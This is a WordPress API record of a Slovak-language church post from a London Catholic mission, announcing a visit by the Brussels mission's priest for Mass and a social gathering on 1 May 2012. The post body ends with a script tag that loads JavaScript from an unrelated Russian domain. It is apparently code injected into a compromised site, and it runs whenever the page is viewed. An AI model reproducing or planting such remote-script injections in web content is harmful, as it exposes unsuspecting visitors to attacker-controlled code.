{"id":12570,"date":"2012-04-20T09:41:27","date_gmt":"2012-04-20T08:41:27","guid":{"rendered":"http:\/\/www.scmlondon.org\/?p=12570"},"modified":"2012-04-02T18:30:06","modified_gmt":"2012-04-02T17:30:06","slug":"navsteva-knaza-duchovneho-otca-a-spravcu-zo-skm-v-bruseli","status":"publish","type":"post","link":"https:\/\/www.scmlondon.org\/?p=12570","title":{"rendered":"N\u00e1v\u0161teva k\u0148aza &#8211; duchovn\u00e9ho otca a spr\u00e1vcu zo SKM v Bruseli"},"content":{"rendered":"<p><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2012\/03\/P1310008.jpg\" data-rel=\"lightbox-image-0\" data-rl_title=\"\" data-rl_caption=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-thumbnail wp-image-12571\" title=\"\" src=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2012\/03\/P1310008-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/a>S rados\u0165ou si dovo\u013eujem ozn\u00e1mi\u0165, \u017ee d\u0148a 1. m\u00e1ja 2012 (utorok) n\u00e1s nav\u0161t\u00edvi duchovn\u00fd spr\u00e1vca SKM v Bruseli dp. \u013dubom\u00edr Fab\u010din. V tento de\u0148 budeme spolo\u010dne\u00a0 sl\u00e1vi\u0165 Eucharistiu v na\u0161om chr\u00e1me Our Lady of La Salette and St.. Joseph na 14 Melior Street v\u00a0 Lond\u00fdne o 19.30 hod.. Ver\u00edm, \u017ee bude pre n\u00e1s povzbuden\u00edm stretn\u00fa\u0165 sa s n\u00edm a po\u010du\u0165, ako pre\u017e\u00edvaj\u00fa Slov\u00e1ci v Bruseli svoju vieru, ako buduj\u00fa komunitu, aby sme si vz\u00e1jomne vymenili sk\u00fasenosti a podporili sa v \u017eivote viery a duchovnom raste.<\/p>\n<p>Po sv\u00e4tej om\u0161i bude agap\u00e9, kde sa vytvor\u00ed priestor na rozhovor a diskusiu. V\u0161etk\u00fdch v\u00e1s srde\u010dne poz\u00fdvame!<script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>S rados\u0165ou si dovo\u013eujem ozn\u00e1mi\u0165, \u017ee d\u0148a 1. m\u00e1ja 2012 (utorok) n\u00e1s nav\u0161t\u00edvi duchovn\u00fd spr\u00e1vca SKM v Bruseli dp. \u013dubom\u00edr Fab\u010din. V tento de\u0148 budeme spolo\u010dne\u00a0 sl\u00e1vi\u0165 Eucharistiu v na\u0161om&#8230; <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?p=12570\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":417,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-12570","post","type-post","status-publish","format-standard","hentry","category-28"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/12570","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/417"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12570"}],"version-history":[{"count":5,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/12570\/revisions"}],"predecessor-version":[{"id":12573,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/12570\/revisions\/12573"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12570"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12570"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12570"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}